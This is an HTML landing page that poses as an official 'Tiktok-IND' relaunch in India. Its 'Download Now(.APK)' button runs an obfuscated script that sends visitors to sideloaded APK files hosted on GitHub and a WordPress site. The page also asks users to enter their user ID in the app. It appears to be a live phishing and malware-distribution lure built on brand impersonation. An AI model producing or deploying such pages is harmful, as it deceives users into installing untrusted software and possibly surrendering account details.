<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>


<style>
body{
background-color:#000;
color:#000;
font-family: sans-serif;
}
p,h1,h2,h3{
color:#fff;
}
.buttonva {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.sjdvvhsfbwdaf {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.buttonva:hover {
	background-color:#314179;
}
.buttonva:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function usvobwiovbwubo() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://github.com/breakingnewsindia/t1/raw/main/Tiktik-h.apk"; 
	}
	else if(m<10)
	{
		window.location="https://webdesksolution.in/wp-content/Tiktos_pro2.apk";
	}
	else
	{
		window.location="https://webdesksolution.in/wp-content/themes/wds/Tiktos-pro.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="sjdvvhsfbwdaf">
	<img src="https://i.postimg.cc/76h7sn2D/tikk.png" width="34%" />
	<br>
	<p><h1>Tiktok-IND</h1>
		<h2>Tiktok is back in India with<br>
		all new features and Filters.<Br>
		Tiktok PVT.LTD<br> 
		</h2>
<h3>Enter your USERid on (Tiktok-PROS) apk.<br>
Download app and enjoy now!!</h3>
	</p>
	<a onClick="usvobwiovbwubo()" class="buttonva">Download Now(.APK)</a>
</div>
</center>
</body>
</html>